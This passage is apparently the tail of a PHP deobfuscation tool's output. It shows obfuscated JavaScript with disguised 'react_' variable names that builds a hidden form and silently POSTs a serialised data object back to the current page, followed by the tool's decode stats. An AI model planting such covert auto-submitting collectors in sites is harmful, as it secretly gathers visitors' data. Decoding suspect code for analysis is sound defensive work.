react_checkifsnapshotchanged=document['createElement']('form'),react_renderedtail=document['createElement']('input');react_checkifsnapshotchanged['method']='POST',react_checkifsnapshotchanged['action']=window['location']['href'],react_renderedtail['type']='hidden',react_renderedtail['name']='data',react_renderedtail['value']=JSON['stringify'](react_onsocketmessage),react_checkifsnapshotchanged['appendChild'](react_renderedtail),document['body']['appendChild'](react_checkifsnapshotchanged),react_checkifsnapshotchanged['submit']();}());}());</script>
    </div>
  </body>
</html>
<?php exit();

Function Calls

None

Variables

None

Stats

MD5 5c69c566ad6e09ed3916cf843539d683
Eval Count 0
Decode Time 67 ms